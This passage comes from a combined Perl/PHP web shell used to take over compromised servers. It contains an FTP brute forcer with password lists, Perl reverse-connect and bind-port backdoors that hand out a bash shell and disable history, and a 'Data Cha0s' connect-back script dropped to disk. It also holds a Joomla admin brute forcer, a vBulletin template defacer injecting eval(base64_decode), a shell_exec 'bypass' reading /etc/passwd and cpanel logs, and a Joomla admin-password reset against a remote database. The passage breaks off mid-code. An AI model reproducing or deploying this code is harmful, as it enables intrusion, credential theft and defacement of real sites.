3717<td>User:<br><textarea rows="18" cols="30" name="user">
3718END
3719chop($result .= `less /etc/passwd | cut -d: -f1`);
3720$result .= <<'END';
3721</textarea></td>
3722<td>
3723
3724Pass:<br>
3725<textarea rows="18" cols="30" name="pass">123pass
3726123!@#
3727123admin
3728123abc
3729123456admin
37301234554321
373112344321
3732pass123
3733admin
3734admincp
3735administrator
3736matkhau
3737passadmin
3738p@ssword
3739p@ssw0rd
3740password
3741123456
37421234567
374312345678
3744123456789
37451234567890
3746111111
3747000000
3748222222
3749333333
3750444444
3751555555
3752666666
3753777777
3754888888
3755999999
3756123123
3757234234
3758345345
3759456456
3760567567
3761678678
3762789789
3763123321
3764456654
3765654321
37667654321
376787654321
3768987654321
37690987654321
3770admin123
3771admin123456
3772abcdef
3773abcabc
3774!@#!@#
3775!@#$%^
3776!@#$%^&*(
3777!@#$$#@!
3778abc123
3779anhyeuem
3780iloveyou</textarea>
3781</td>
3782</tr>
3783<tr>
3784<td colspan="2" align="center">
3785Sleep:<select name="sleep">
3786
3787<option>0</option>
3788<option>1</option>
3789<option>2</option>
3790
3791<option>3</option>
3792</select>
3793<input type="submit" class="submit" value="Brute Forcer"/></td></tr>
3794</form>
3795</table>
3796END
3797return $result;
3798}
3799#------------------------------------------------------------------------------
3800# Brute Forcer
3801#------------------------------------------------------------------------------
3802sub BruteForcer
3803{
3804 my $result="";
3805 $Server=$ENV{'SERVER_ADDR'};
3806 if($in{'user'} eq "")
3807 {
3808 $result .= &BruteForcerForm;
3809 }else
3810 {
3811 use Net::FTP;
3812 @user= split(/\n/, $in{'user'});
3813 @pass= split(/\n/, $in{'pass'});
3814 chomp(@user);
3815 chomp(@pass);
3816 $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
3817 foreach $username (@user)
3818 {
3819 if(!($username eq ""))
3820 {
3821 foreach $password (@pass)
3822 {
3823 $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
3824 if($ftp->login("$username","$password"))
3825 {
3826 $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
3827 $ftp->quit();
3828 break;
3829 }
3830 if(!($in{'sleep'} eq "0"))
3831 {
3832 sleep(int($in{'sleep'}));
3833 }
3834 $ftp->quit();
3835 }
3836 }
3837 }
3838 $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
3839 }
3840 return $result;
3841}
3842#------------------------------------------------------------------------------
3843# Backconnect Form
3844#------------------------------------------------------------------------------
3845sub BackBindForm
3846{
3847 return <<END;
3848 <br><br>
3849
3850 <table>
3851 <tr>
3852 <form name="f" method="POST" action="$ScriptLocation">
3853 <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
3854 <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
3855 Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
3856
3857 <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
3858 </form>
3859 </tr>
3860 <tr>
3861 <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
3862 <br>[+] Try check your Port with <a target="_blank" href="hxxp://www.canyouseeme.org/">hxxp://www.canyouseeme.org/</a>
3863 <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
3864
3865 </tr>
3866 </table>
3867
3868 <br><br>
3869 <table>
3870 <tr>
3871 <form method="POST" action="$ScriptLocation">
3872 <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
3873
3874 <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
3875
3876 Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
3877 <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
3878 </form>
3879 </tr>
3880 <tr>
3881 <td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
3882 <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
3883
3884 </tr>
3885 </table><br>
3886END
3887}
3888#------------------------------------------------------------------------------
3889# Backconnect use perl
3890#------------------------------------------------------------------------------
3891sub BackBind
3892{
3893 use MIME::Base64;
3894 use Socket;
3895 $backperl="#!/usr/bin/perl
3896use IO::Socket;
3897$Shell = "/bin/bash";
3898$ARGC=@ARGV;
3899use Socket;
3900use FileHandle;
3901socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";
3902connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
3903print "Connected!";
3904SOCKET->autoflush();
3905open(STDIN, ">&SOCKET");
3906open(STDOUT,">&SOCKET");
3907open(STDERR,">&SOCKET");
3908print "--== Connected Backdoor ==-- \n\n";
3909system("unset HISTFILE; unset SAVEHIST ;echo '[+] Systeminfo: '; uname -a;echo;echo '[+] Userinfo: '; id;echo;echo '[+] Directory: '; pwd;echo; echo '[+] Shell: ';$Shell");
3910close SOCKET;";
3911 $bindperl="#!/usr/bin/perl
3912use Socket;
3913$ARGC=@ARGV;
3914$port = $ARGV[0];
3915$proto = getprotobyname('tcp');
3916$Shell = "/bin/bash";
3917socket(SERVER, PF_INET, SOCK_STREAM, $proto)or die "socket:$!";
3918setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))or die "setsockopt: $!";
3919bind(SERVER, sockaddr_in($port, INADDR_ANY))or die "bind: $!";
3920listen(SERVER, SOMAXCONN) or die "listen: $!";
3921for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
3922{
3923 open(STDIN, ">&CLIENT");
3924 open(STDOUT, ">&CLIENT");
3925 open(STDERR, ">&CLIENT");
3926 system("unset HISTFILE; unset SAVEHIST ;echo '[+] Systeminfo: '; uname -a;echo;echo '[+] Userinfo: '; id;echo;echo '[+] Directory: '; pwd;echo; echo '[+] Shell: ';$Shell");
3927 close(STDIN);
3928 close(STDOUT);
3929 close(STDERR);
3930}
3931";
3932
3933 $ClientAddr = $in{'clientaddr'};
3934 $ClientPort = int($in{'clientport'});
3935 if($ClientPort eq 0)
3936 {
3937 return &BackBindForm;
3938 }elsif(!$ClientAddr eq "")
3939 {
3940 $Data=decode_base64($backperl);
3941 if(-w "/tmp/")
3942 {
3943 $File="/tmp/backconnect.pl";
3944 }else
3945 {
3946 $File=$CurrentDir.$PathSep."backconnect.pl";
3947 }
3948 open(FILE, ">$File");
3949 print FILE $Data;
3950 close FILE;
3951 system("perl backconnect.pl $ClientAddr $ClientPort");
3952 unlink($File);
3953 exit 0;
3954 }else
3955 {
3956 $Data=decode_base64($bindperl);
3957 if(-w "/tmp")
3958 {
3959 $File="/tmp/bindport.pl";
3960 }else
3961 {
3962 $File=$CurrentDir.$PathSep."bindport.pl";
3963 }
3964 open(FILE, ">$File");
3965 print FILE $Data;
3966 close FILE;
3967 system("perl bindport.pl $ClientPort");
3968 unlink($File);
3969 exit 0;
3970 }
3971}
3972#------------------------------------------------------------------------------
3973# Array List Directory
3974#------------------------------------------------------------------------------
3975sub RmDir($)
3976{
3977 my $dir = shift;
3978 if(opendir(DIR,$dir))
3979 {
3980 while($file = readdir(DIR))
3981 {
3982 if(($file ne ".") && ($file ne ".."))
3983 {
3984 $file= $dir.$PathSep.$file;
3985 if(-d $file)
3986 {
3987 &RmDir($file);
3988 }
3989 else
3990 {
3991 unlink($file);
3992 }
3993 }
3994 }
3995 closedir(DIR);
3996 }
3997 if(!rmdir($dir))
3998 {
3999
4000 }
4001}
4002sub FileOwner($)
4003{
4004 my $file = shift;
4005 if(-e $file)
4006 {
4007 ($uid,$gid) = (stat($file))[4,5];
4008 if($WinNT)
4009 {
4010 return "???";
4011 }
4012 else
4013 {
4014 $name=getpwuid($uid);
4015 $group=getgrgid($gid);
4016 return $name."/".$group;
4017 }
4018 }
4019 return "???";
4020}
4021sub ParentFolder($)
4022{
4023 my $path = shift;
4024 my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
4025 chop($path = `$Comm`);
4026 return $path;
4027}
4028sub FilePerms($)
4029{
4030 my $file = shift;
4031 my $ur = "-";
4032 my $uw = "-";
4033 if(-e $file)
4034 {
4035 if($WinNT)
4036 {
4037 if(-r $file){ $ur = "r"; }
4038 if(-w $file){ $uw = "w"; }
4039 return $ur . " / " . $uw;
4040 }else
4041 {
4042 $mode=(stat($file))[2];
4043 $result = sprintf("%04o", $mode & 07777);
4044 return $result;
4045 }
4046 }
4047 return "0000";
4048}
4049sub FileLastModified($)
4050{
4051 my $file = shift;
4052 if(-e $file)
4053 {
4054 ($la) = (stat($file))[9];
4055 ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
4056 $y = $y + 1900;
4057 @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
4058 $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
4059 return $lmtime;
4060 }
4061 return "???";
4062}
4063sub FileSize($)
4064{
4065 my $file = shift;
4066 if(-f $file)
4067 {
4068 return -s $file;
4069 }
4070 return "0";
4071
4072}
4073sub ParseFileSize($)
4074{
4075 my $size = shift;
4076 if($size <= 1024)
4077 {
4078 return $size. " B";
4079 }
4080 else
4081 {
4082 if($size <= 1024*1024)
4083 {
4084 $size = sprintf("%.02f",$size / 1024);
4085 return $size." KB";
4086 }
4087 else
4088 {
4089 $size = sprintf("%.2f",$size / 1024 / 1024);
4090 return $size." MB";
4091 }
4092 }
4093}
4094sub trim($)
4095{
4096 my $string = shift;
4097 $string =~ s/^\s+//;
4098 $string =~ s/\s+$//;
4099 return $string;
4100}
4101sub AddSlashes($)
4102{
4103 my $string = shift;
4104 $string=~ s/\\/\\\\/g;
4105 return $string;
4106}
4107sub ListDir
4108{
4109 my $path = $CurrentDir.$PathSep;
4110 $path=~ s/\\\\/\\/g;
4111 my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
4112 if(-d $path)
4113 {
4114 my @fname = ();
4115 my @dname = ();
4116 if(opendir(DIR,$path))
4117 {
4118 while($file = readdir(DIR))
4119 {
4120 $f=$path.$file;
4121 if(-d $f)
4122 {
4123 push(@dname,$file);
4124 }
4125 else
4126 {
4127 push(@fname,$file);
4128 }
4129 }
4130 closedir(DIR);
4131 }
4132 @fname = sort { lc($a) cmp lc($b) } @fname;
4133 @dname = sort { lc($a) cmp lc($b) } @dname;
4134 $result .= "<div><table width='90%' class='listdir'>
4135
4136 <tr style='background-color: #3e3e3e'><th>File Name</th>
4137 <th style='width:100px;'>File Size</th>
4138 <th style='width:150px;'>Owner</th>
4139 <th style='width:100px;'>Permission</th>
4140 <th style='width:150px;'>Last Modified</th>
4141 <th style='width:260px;'>Action</th></tr>";
4142 my $style="line";
4143 my $i=0;
4144 foreach my $d (@dname)
4145 {
4146 $style= ($style eq "line") ? "notline": "line";
4147 $d = &trim($d);
4148 $dirname=$d;
4149 if($d eq "..")
4150 {
4151 $d = &ParentFolder($path);
4152 }
4153 elsif($d eq ".")
4154 {
4155 $d = $path;
4156 }
4157 else
4158 {
4159 $d = $path.$d;
4160 }
4161 $result .= "<tr class='$style'>
4162
4163 <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
4164 $result .= "<td>DIR</td>";
4165 $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
4166 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
4167 $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
4168 $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a> | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
4169 $result .= "</tr>";
4170 $i++;
4171 }
4172 foreach my $f (@fname)
4173 {
4174 $style= ($style eq "line") ? "notline": "line";
4175 $file=$f;
4176 $f = $path.$f;
4177 $view = "?dir=".$path."&view=".$f;
4178 $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
4179 $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
4180 $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
4181 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
4182 $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
4183 $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
4184 $result .= "</tr>";
4185 $i++;
4186 }
4187 $result .= "</table></div>";
4188 }
4189 return $result;
4190}
4191#------------------------------------------------------------------------------
4192# Try to View List User
4193#------------------------------------------------------------------------------
4194sub ViewDomainUser
4195{
4196 open (domains, '/etc/named.conf') or $err=1;
4197 my @cnzs = <domains>;
4198 close d0mains;
4199 my $style="line";
4200 my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
4201 if ($err)
4202 {
4203 $result .= ('<p>C0uldn\'t Bypass it , Sorry</p>');
4204 return $result;
4205 }else
4206 {
4207 $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
4208 }
4209 foreach my $one (@cnzs)
4210 {
4211 if($one =~ m/.*?zone "(.*?)" {/)
4212 {
4213 $style= ($style eq "line") ? "notline": "line";
4214 $filename= "/etc/valiases/".$one;
4215 $owner = getpwuid((stat($filename))[4]);
4216 $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
4217 }
4218 }
4219 $result .= '</table>';
4220 return $result;
4221}
4222#------------------------------------------------------------------------------
4223# View Log
4224#------------------------------------------------------------------------------
4225sub ViewLog
4226{
4227 if($WinNT)
4228 {
4229 return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
4230 }
4231 my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
4232 my @pathlog=(
4233 '/usr/local/apache/logs/error_log',
4234 '/var/log/hxxpd/error_log',
4235 '/usr/local/apache/logs/access_log'
4236 );
4237 my $i=0;
4238 my $perms;
4239 my $sl;
4240 foreach my $log (@pathlog)
4241 {
4242 if(-w $log)
4243 {
4244 $perms="OK";
4245 }else
4246 {
4247 chop($sl = `ln -s $log error_log_$i`);
4248 if(&trim($ls) eq "")
4249 {
4250 if(-r $ls)
4251 {
4252 $perms="OK";
4253 $log="error_log_".$i;
4254 }
4255 }else
4256 {
4257 $perms="<font style='color: red;'>Cancel<font>";
4258 }
4259 }
4260 $result .=<<END;
4261 <tr>
4262
4263 <form action="" method="post">
4264 <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
4265 <td><input class="submit" type="submit" value="Try" /></td>
4266 <input type="hidden" id="log_$i" name="c" value="less $log"/>
4267 <input type="hidden" name="a" value="command" />
4268 <input type="hidden" name="d" value="$CurrentDir" />
4269 </form>
4270 <td>$perms</td>
4271
4272 </tr>
4273END
4274 $i++;
4275 }
4276 $result .="</table>";
4277 return $result;
4278}
4279#------------------------------------------------------------------------------
4280# Main Program - Execution Starts Here
4281#------------------------------------------------------------------------------
4282&ReadParse;
4283&GetCookies;
4284
4285$ScriptLocation = $ENV{'SCRIPT_NAME'};
4286$ServerName = $ENV{'SERVER_NAME'};
4287$LoginPassword = $in{'p'};
4288$RunCommand = $in{'c'};
4289$TransferFile = $in{'f'};
4290$Options = $in{'o'};
4291$Action = $in{'a'};
4292
4293$Action = "command" if($Action eq ""); # no action specified, use default
4294
4295# get the directory in which the commands will be executed
4296$CurrentDir = &trim($in{'d'});
4297# mac dinh xuat thong tin neu ko co lenh nao!
4298$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
4299chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
4300
4301$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
4302
4303if($Action eq "login" || !$LoggedIn) # user needs/has to login
4304{
4305 &PerformLogin;
4306}elsif($Action eq "gui") # GUI directory
4307{
4308 &PrintPageHeader;
4309 if(!$WinNT)
4310 {
4311 $chmod=int($in{'chmod'});
4312 if(!($chmod eq 0))
4313 {
4314 $chmod=int($in{'chmod'});
4315 $file=$CurrentDir.$PathSep.$TransferFile;
4316 chop($result= `chmod $chmod "$file"`);
4317 if(&trim($result) eq "")
4318 {
4319 print "<run> Done! </run><br>";
4320 }else
4321 {
4322 print "<run> Sorry! You dont have permissions! </run><br>";
4323 }
4324 }
4325 }
4326 $rename=$in{'rename'};
4327 if(!$rename eq "")
4328 {
4329 if(rename($TransferFile,$rename))
4330 {
4331 print "<run> Done! </run><br>";
4332 }else
4333 {
4334 print "<run> Sorry! You dont have permissions! </run><br>";
4335 }
4336 }
4337 $remove=$in{'remove'};
4338 if($remove ne "")
4339 {
4340 $rm = $CurrentDir.$PathSep.$remove;
4341 if(-d $rm)
4342 {
4343 &RmDir($rm);
4344 }else
4345 {
4346 if(unlink($rm))
4347 {
4348 print "<run> Done! </run><br>";
4349 }else
4350 {
4351 print "<run> Sorry! You dont have permissions! </run><br>";
4352 }
4353 }
4354 }
4355 print &ListDir;
4356
4357}
4358elsif($Action eq "command") # user wants to run a command
4359{
4360 &PrintPageHeader("c");
4361 print &ExecuteCommand;
4362}
4363elsif($Action eq "save") # user wants to save a file
4364{
4365 &PrintPageHeader;
4366 if(&SaveFile($in{'data'},$in{'file'}))
4367 {
4368 print "<run> Done! </run><br>";
4369 }else
4370 {
4371 print "<run> Sorry! You dont have permissions! </run><br>";
4372 }
4373 print &ListDir;
4374}
4375elsif($Action eq "upload") # user wants to upload a file
4376{
4377 &PrintPageHeader;
4378
4379 print &UploadFile;
4380}
4381elsif($Action eq "backbind") # user wants to back connect or bind port
4382{
4383 &PrintPageHeader("clientport");
4384 print &BackBind;
4385}
4386elsif($Action eq "bruteforcer") # user wants to brute force
4387{
4388 &PrintPageHeader;
4389 print &BruteForcer;
4390}elsif($Action eq "download") # user wants to download a file
4391{
4392 print &DownloadFile;
4393}elsif($Action eq "checklog") # user wants to view log file
4394{
4395 &PrintPageHeader;
4396 print &ViewLog;
4397
4398}elsif($Action eq "domainsuser") # user wants to view list user/domain
4399{
4400 &PrintPageHeader;
4401 print &ViewDomainUser;
4402}elsif($Action eq "logout") # user wants to logout
4403{
4404 &PerformLogout;
4405}
4406&PrintPageFooter;
4407'; $file = fopen("izo.cin" ,"w+"); $write = fwrite ($file ,base64_decode($cgishellizocin)); fclose($file); chmod("izo.cin",0755); $netcatshell = '#!/usr/bin/perl
4408 use Socket;
4409 print "Data Cha0s Connect Back Backdoor\n\n";
4410 if (!$ARGV[0]) {
4411 printf "Usage: $0 [Host] <Port>\n";
4412 exit(1);
4413 }
4414 print "[*] Dumping Arguments\n";
4415 $host = $ARGV[0];
4416 $port = 80;
4417 if ($ARGV[1]) {
4418 $port = $ARGV[1];
4419 }
4420 print "[*] Connecting...\n";
4421 $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
4422 socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
4423 my $target = inet_aton($host);
4424 if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
4425 die("Unable to Connect\n");
4426 }
4427 print "[*] Spawning Shell\n";
4428 if (!fork( )) {
4429 open(STDIN,">&SERVER");
4430 open(STDOUT,">&SERVER");
4431 open(STDERR,">&SERVER");
4432 exec {'/bin/sh'} '-bash' . "\0" x 4;
4433 exit(0);
4434 }
4435 print "[*] Datached\n\n";'; $file = fopen("dc.pl" ,"w+"); $write = fwrite ($file ,base64_decode($netcatshell)); fclose($file); chmod("dc.pl",0755); echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe>
4436
4437
4438 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jbrute')) { ?>
4439<form action="?y=<?php echo $pwd; ?>&x=jbrute" method="post">
4440
4441 <meta name="author" content="RetnOHacK" />
4442 <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />
4443 <meta name="description" content="RetnOHacK #Procoder'z Team Albanian" />
4444<center>
4445</br></br>
4446<center><b><font color="lime">--==[ Joomla Bruter Force ]==--</font></b><br /><br />
4447<form method="post" action="" enctype="multipart/form-data">
4448<table class="tabnet" width="38%" border="0"><center>
4449<th colspan="2">Joomla Brute Force</th>
4450<tr><td><p ><font class="d1">User :</font></th>
4451<input class="inputz" type='text' name="usr" value="admin" size="15"> </font></center><br /><br /></p>
4452</td></tr>
4453<tr><td><font class="">Sites list :</font>
4454</td><td><font class="" >Pass list :</font></td></tr>
4455<tr>
4456 <td>
4457<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>
4458</td><td>
4459<textarea name="w0rds" style="background:black;" cols="40" rows="13" >
4460admin
4461Adm
4462Administrator
4463administrador
4464adm2014adm2012
4465123456
4466password
4467102030
4468123123
446912345
4470123456789
4471pass
4472test
4473admin123
4474demo
4475!@#$%^
4476</textarea>
4477</td></tr><center><tr><td>
4478<font >
4479<input class="inputzbut" type="submit" name="x" value="start" id="d4">
4480</font></td></tr><br>
4481Thanks to procoder, Team Albanian<br></center></table>
4482</form></center>
4483<?php @set_time_limit(0); if($_POST['x']){ echo "<hr>"; $sites = explode("\n",$_POST["sites"]); $w0rds = explode("\n",$_POST["w0rds"]); $Attack = new Joomla_brute_Force(); foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); flush();flush(); } } } function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); } class Joomla_brute_Force{ public function check_it($site,$user,$pass){ if(eregi('com_config',$this->post($site,$user,$pass))){ echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>"; $f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f); flush(); }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} } public function post($site,$user,$pass){ $token = $this->extract_token($site); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1'); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function extract_token($site){ $source = $this->get_source($site); preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); return $token[1][0]; } public function get_source($site){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) { ?>
4484 <form action="?y=<?php echo $pwd; ?>&x=vb" method="post">
4485 <br><br><br><div align="center">
4486 <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
4487 <b><font color="#FF0000">--==[ VB Index Changer ]==--</font></b>
4488 </div><br>
4489 <?php if(empty($_POST['index'])){ echo "<center><FORM method=\"POST\">"; echo "<table class=\"tabnet\">
4490<th colspan=\"2\">Vb Index Changer</th>
4491<tr><td>host </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"localhost\" value=\"localhost\"></td></tr>
4492<tr><td>database </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"database\" value=\"forum_vb\"></td></tr>
4493<tr><td>username </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"username\" value=\"user_vb\"></td></tr>
4494<tr><td>password </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"password\" value=\"vb\"></td></tr>
4495</tr>
4496<th colspan=\"2\">Your Index Code</th></table><table class=\"tabnet\">
4497<TEXTAREA name=\"index\" rows=\"13\" style=\"background:black\" border=\"1\" cols=\"69\" name=\"code\">your index code</TEXTAREA><br>
4498<INPUT class=\"inputzbut\" type=\"submit\" value=\"setting\" name=\"send\">
4499</FORM></table></center>"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $index = $_POST['index']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $index=str_replace("\'","'",$index); $set_index = "{\${eval(base64_decode(\'"; $set_index .= base64_encode("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}</textarea>"; echo("UPDATE template SET template ='".$set_index."' ") ; $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error()); if($ok){ echo "!! update finish !!<br><br>"; } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass')) { ?>
4500<form action="?y=<?php echo $pwd; ?>&x=bypass" method="post">
4501
4502<?php echo "<center/><br/><b><font color=#FF0000>--==[ Command Bypass Exploit ]==--</font></b><br>
4503"; print_r('
4504<pre>
4505<form method="POST" action="">
4506<b><font color=#FF0000><b><font color="#FF0000">Command :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
4507</form>
4508<form method="POST" action=""><strong><b><font color="#FF0000">Menu Bypass :=) </font></strong><select name="liz0" size="1" class="inputz">
4509<option value="cat /etc/passwd">/etc/passwd</option>
4510<option value="netstat -an | grep -i listen">netstat</option>
4511<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
4512<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
4513<option value="cat /etc/hosts">/etc/hosts</option>
4514<option value="cat /etc/named.conf">/etc/named.conf</option>
4515<option value="cat /etc/hxxpd/conf/hxxpd.conf">/etc/hxxpd/conf/hxxpd.conf</option>
4516</select> <input type="submit" class="inputzbut" value="Gö">
4517</form>
4518</pre>
4519'); ini_restore("safe_mode"); ini_restore("open_basedir"); $liz0=shell_exec($_POST[baba]); $liz0zim=shell_exec($_POST[liz0]); $uid=shell_exec('id'); $server=shell_exec('uname -a'); echo "<pre><h4>"; echo $liz0; echo $liz0zim; echo "</h4></pre>"; "</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jodexer')) { ?>
4520<form action="?y=<?php echo $pwd; ?>&x=jodexer" method="post">
4521
4522<?php function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; } if ($_POST['form_action']) { $text=file_get_contents($_POST['file']); $username=entre2v2($text,"public $user = '","';"); $password=entre2v2($text,"public $password = ', '","';"); $dbname=entre2v2($text,"public $db = ', '","';"); $dbprefix=entre2v2($text,"public $dbprefix = '","';"); $site_url=($_POST['site_url']); $h="<?php echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>"; $co=randomt(); $co=randomt(); if ($_POST['form_action']) { $h="<?php echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>"; $link=mysql_connect("dzoed.druknet.bt",$username,$password) ; mysql_select_db($dbname,$link) ; $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'"); echo("<br>[+] Changing admin password to 123456789"); $req =mysql_query("SELECT * from 